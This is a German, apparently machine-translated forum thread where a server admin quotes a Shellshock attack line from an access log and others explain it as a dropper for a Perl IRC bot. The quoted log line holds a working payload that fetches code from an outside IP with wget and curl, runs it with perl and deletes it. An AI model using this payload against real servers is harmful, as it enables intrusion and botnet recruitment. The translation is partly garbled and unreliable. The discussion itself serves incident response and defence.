Habe das access.log
auf meinem Testserver gesehen:
> 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget
> http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ;
> perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
Keiner der Adressen ist mit mir verwendet oder unserem IP-Bereich (oder irgendetwas anderes für diese Angelegenheit) unmittelbar über die Denken Shellshock Sicherheitslücke / „bashdoor“.
Es sieht tatsächlich so aus, als hätte jemand versucht, curl
"etwas" auf den Server zu bringen, dieses "etwas" dann ausgeführt und anschließend "etwas" mit gelöscht -rf
.
Dies ist ein reiner Testserver, es wird kein Schaden angerichtet (== außer einer Neuinstallation kann kein Schaden angerichtet werden) - aber das Timing ist sehr interessant. Sowas habe ich noch nie gesehen, soweit ich mich erinnere.
Sollte ich mir Sorgen machen, zB "interessiert" sein? Hat jemand eine Idee was das ist?
security
shell-script
webserver
Davidkonrad
quelle
quelle
Antworten:
Das ist jemand, der den Shellshock-Bug ausnutzt. Können Sie feststellen, was das Perl-Skript tat? Das ist definitiv einen Blick wert. Die zweite verwendete URL gibt 404 zurück, ist jedoch
http://213.5.67.223/ji
vorhanden und möglicherweise identisch, da es sich um ein Perl-Skript handelt. Es scheint sich um einen IRC-Server zu handeln, daher kann es interessant sein, mit einem IRC-Client eine Verbindung zu Ihrem Testserver herzustellen. EDIT: Kommentar korrigiert mich, es ist ein Client, der in der Lage ist, dich zu beschnüffeln.Überprüfen Sie auch, ob das Perl-Skript noch ausgeführt wird.
quelle
ps -ax | grep perl
oderps ax | grep perl
ps -ef
kann ich sehen, dass es einen/usr/sbin/apache2 -k start
mit genau demselben Zeitstempel gibt :( Also ich denke, der Angriff war erfolgreich. Habe Bash mitsudo apt-get update && sudo apt-get install --only-upgrade bash
shell
Routine, die mich beunruhigt hat: my @ resp =$comando 2>&1 3>&1
; Kein Schaden, soweit ich das beurteilen kann.Die Shellshock-Sicherheitsanfälligkeit wird zum Herunterladen (Verwenden
wget
) und Ausführen eines bösartigen Perl-Skripts verwendet. Dieser Angriff ist sehr einfach und erfordert die Installation von Perl und wget (vorausgesetzt, einer von ihnen ist nicht vorhanden und Sie sind sicher, dass es keine weiteren Cracking-Versuche gegeben hat. Ihr Server wurde nicht kompromittiert).Das Skript selbst ist ein grundlegender Skript-Kiddie-IRC-Bot, der, sobald er ausgeführt wird, eine Verbindung zu einem IRC-Server herstellt und auf Befehle wartet. Es sieht so aus, als ob er über Google-Suchfunktionen verfügt, die höchstwahrscheinlich automatisch nach anfälligen Hosts suchen und versuchen, diese auszunutzen. Abgesehen davon haben Sie natürlich das grundlegende Skiddie-Arsenal: HTTP-Flood, TCP- und UDP-Flood und Shell-Zugriff (als der Benutzer, der das Skript ausgeführt hat, als der Benutzer, unter dem der HTTP-Server ausgeführt wird).
quelle
Wie bereits von anderen erwähnt, handelt es sich um einen Versuch eines Script-Kiddies, die Bash-Sicherheitslücke auszunutzen, um einen Perl-Script-basierten IRC-Bot auszuführen. Wenn Sie die Bash-Aktualisierung durchgeführt haben und Apache wie ich unter chroot ausführen , müssen Sie sich keine Sorgen machen. Ich sehe mindestens jeden zweiten Tag seit dem 27. September mehrere Versionen davon in meinem Log (siehe unten) ... das ist nur ein Geräusch.
Eine andere Art von Skript-Ausführungsversuch (Python-Skript) ist mir heute gerade aufgefallen. HINWEIS: google-traffic-analytics.com, wo das Python-Skript heruntergeladen wird, hat mit Google natürlich nichts zu tun.
quelle